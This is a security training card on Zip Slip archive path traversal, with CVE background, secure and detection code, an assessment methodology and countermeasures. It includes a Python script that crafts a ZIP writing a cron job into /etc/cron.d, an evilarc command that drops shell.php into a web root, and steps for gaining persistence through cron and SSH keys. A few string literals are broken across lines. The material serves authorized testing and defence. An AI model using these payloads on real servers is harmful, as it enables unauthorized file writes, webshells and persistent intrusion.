Zip Slip Path Traversal: Archive Extraction Directory Escape for Server-Side File System Write

web_injection_logic Difficulty 1–5 30 min certifiable

Theory

Why This Matters

Zip Slip was documented by Snyk in 2018 as a widespread vulnerability affecting thousands of open-source projects simultaneously. The research identified vulnerable extraction code in Java, Python, .NET, Go, and Ruby libraries. CVE-2018-1002201 (zip4j), CVE-2018-8009 (Apache Hadoop), CVE-2018-10408 (multiple), and CVE-2023-22899 (Zip4j again) are among dozens of assigned CVEs. The vulnerability allows an attacker who can submit an archive for server-side extraction to write arbitrary files to arbitrary filesystem paths, including startup scripts, cron jobs, SSH authorized keys, and web application configuration files — all without requiring code execution in the initial upload step.

Core Concept

An archive file (ZIP, TAR, JAR, WAR, APK, or any container format) stores a list of entries, each with a stored path that specifies where the file should be extracted relative to a destination directory. The vulnerability exists when extraction code uses the stored path directly — or after only a superficial check — without verifying that the resolved absolute path remains within the intended destination directory.

The path traversal payload in a Zip Slip archive contains entries with names like ../../etc/cron.d/backdoor or ../../../root/.ssh/authorized_keys. When a vulnerable extractor writes each entry to destination + entry.getName(), the ../ sequences cause the write to escape the intended extraction directory and land at an attacker-controlled absolute path.

The violated invariant is: the canonical absolute path of every extracted file must start with the canonical absolute path of the extraction destination. The correct check is:

canonical_dest = Path(dest).resolve()
canonical_file = (canonical_dest / entry_name).resolve()
assert str(canonical_file).startswith(str(canonical_dest) + os.sep)

Without .resolve() or equivalent canonicalization, a path like /tmp/extract/../../etc/cron.d/backdoor passes naive prefix checks because the attacker can include enough leading legitimate directories to make the string-level prefix match, then traverse out.

Exploitation impact depends on what the web server process can write. In the common case of a www-data user, writable targets include: cron jobs (if /etc/cron.d/ is world-writable or writable by www-data), the web application's own configuration files (overwriting database credentials or enabling debug mode), files in the web root (deploying a webshell without going through the upload filter), and ~/.ssh/authorized_keys if the home directory is accessible.

Technical Deep-Dive

# Crafting a malicious zip archive for Zip Slip
# Prerequisites: pip install zipfile (stdlib)

import zipfile
import os

def create_zip_slip(output_path, target_file, payload_content, depth=6):
    """
    Create a ZIP containing a path-traversal entry.
    output_path:     where to write the malicious .zip
    target_file:     absolute or relative destination (e.g. ../../etc/cron.d/evil)
    payload_content: bytes to write at the target
    depth:           traversal depth (../  repeated)
    """
    traversal = "../" * depth + target_file.lstrip("/")
    with zipfile.ZipFile(output_path, "w", zipfile.ZIP_DEFLATED) as zf:
        # Add a benign file first to look legitimate
        zf.writestr("readme.txt", "Legitimate archive contents.
")
        # Add the malicious traversal entry
        zf.writestr(traversal, payload_content)
    print(f"[+] Created {output_path}")
    print(f"[+] Malicious entry: {traversal}")

# Example: write a cron job that creates /tmp/pwned
cron_payload = "* * * * * www-data touch /tmp/pwned
"
create_zip_slip(
    output_path="evil.zip",
    target_file="etc/cron.d/pwned",
    payload_content=cron_payload,
    depth=8,
)

# ── Vulnerable extraction code (Java-style pseudocode) ────────────────────
# ZipFile zip = new ZipFile(uploadedFile);
# for (ZipEntry entry : zip.entries()) {
#     File outFile = new File(destDir, entry.getName());  // VULNERABLE
#     // No canonicalization check — ../  sequences traverse out of destDir
#     Files.copy(zip.getInputStream(entry), outFile.toPath());
# }

# ── Secure extraction (Python) ────────────────────────────────────────────
import zipfile, os, pathlib

def safe_extract(zip_path, dest):
    dest = pathlib.Path(dest).resolve()
    with zipfile.ZipFile(zip_path) as zf:
        for member in zf.namelist():
            target = (dest / member).resolve()
            # Ensure resolved path is inside dest
            if not str(target).startswith(str(dest) + os.sep):
                raise ValueError(f"Zip Slip attempt blocked: {member}")
            zf.extract(member, dest)

# Python 3.12+: zipfile.ZipFile.extractall(filter="data") handles this

# Detection: inspect archive entry names before extraction
python3 -c "
import zipfile, sys
with zipfile.ZipFile(sys.argv[1]) as z:
    for name in z.namelist():
        if '..' in name or name.startswith('/'):
            print('[!] Suspicious entry:', name)
" suspicious.zip

# evilarc tool for rapid malicious archive generation
python3 evilarc.py shell.php -o evil.zip -p "var/www/html/uploads/" -d 5
# -p: prefix path to include, -d: traversal depth

Security Assessment Methodology

Identify archive upload or processing endpoints — Look for file upload fields accepting .zip, .tar, .jar, .war, or similar. Also look for server-side features that fetch and extract remote archives (update mechanisms, plugin installers).
Inspect entry names in any provided archives — Use python3 -c "import zipfile,sys; [print(n) for n in zipfile.ZipFile(sys.argv[1]).namelist()]" archive.zip to list entries. Traversal entries in an existing archive are an immediate indicator of a vulnerable upstream component.
Craft a test archive with a safe canary path — Use evilarc or the Python script above to create a ZIP with an entry targeting a world-writable path (e.g., /tmp/zipslip_canary). Upload it and check for file creation.
Target web root for webshell write — If the web root path is known or guessable, craft an entry that resolves to <webroot>/zipslip_test.php containing <?php echo "ZIPSLIP"; ?>. Request the path and check for the echo.
Escalate to persistence — If /etc/cron.d/ is writable, write a cron job. If ~/.ssh/authorized_keys is reachable, write an SSH public key for persistence.
Verify library version — Check dependency manifests (pom.xml, requirements.txt, go.mod) for known-vulnerable extraction library versions as corroborating evidence.

Defensive Countermeasure — Canonicalize both the destination directory and each resolved entry path using Path.resolve() (Python/Java) or filepath.Clean + filepath.Abs (Go). Assert that the resolved entry path begins with the resolved destination path plus a path separator. In Python 3.12+, use ZipFile.extractall(filter="data"). In Java, prefer ZipInputStream with a manual canonicalization check over ZipFile.extractAll. Never extract archives as a privileged user.

Common Assessment Errors

Only checking the outermost archive — Zip bombs and Zip Slip can be nested. Some extractors recursively extract archives found within archives. Test with nested malicious archives if the application processes recursive extraction.
Assuming the web server user cannot write to critical paths — Many deployments run as www-data with write access to configuration files, cron directories, or the web root. Test the actual write outcome, not a theoretical permission model.
Using absolute paths in the payload without sufficient traversal — If the extraction destination is /var/www/html/uploads/, an entry of /etc/cron.d/evil may be rejected by some extractors that strip leading slashes. Use ../ traversal sequences calibrated to the actual directory depth.
Missing JAR and WAR files — Java web application deployments frequently accept JAR/WAR uploads. These are ZIP-format archives. Apply the same Zip Slip test to JAR/WAR upload endpoints.
Not confirming the write actually occurred — Always verify the canary file exists at the target path. Upload success does not guarantee extraction occurred. Some applications delay extraction or process asynchronously.
Neglecting to test the depth of traversal needed — If the destination is /var/www/html/uploads/extracted/, reaching /etc/ requires at least ../../.. (three levels). Calibrate depth in the payload accordingly.

NICE Framework Alignment

Code	Knowledge/Skill/Task Statement	How This Card Develops It
K0009	Knowledge of application vulnerabilities	Explains the canonicalization failure that enables arbitrary file write via archives
K0070	Knowledge of system and application security threats and vulnerabilities	Connects Zip Slip to real CVEs in widely-deployed Java and Python extraction libraries
S0001	Skill in conducting vulnerability scans and recognizing vulnerabilities in security systems	Trains canary-based testing methodology for archive extraction endpoints
S0044	Skill in mimicking threat behaviors to test defenses	Develops archive crafting skills using evilarc and Python zipfile
T0028	Conduct and support authorized penetration testing on enterprise networks	Provides a stepwise assessment procedure from endpoint discovery through persistence
T0591	Perform penetration testing as required for new or updated applications	Frames archive extraction testing as a required component of application assessments